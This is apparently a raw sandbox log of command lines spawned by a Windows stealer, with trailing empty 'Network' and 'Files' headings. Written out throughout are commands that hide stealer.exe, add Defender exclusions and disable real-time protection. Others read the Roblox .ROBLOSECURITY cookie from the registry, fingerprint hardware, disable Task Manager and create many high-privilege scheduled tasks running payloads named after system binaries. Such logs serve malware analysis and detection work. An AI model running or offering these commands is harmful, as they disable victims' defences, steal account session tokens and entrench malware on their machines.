C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
C:\MsWinsessiondllNet\driverBrokercommon.exe
"C:\MsWinsessiondllNet\driverBrokercommon.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"
Network
Files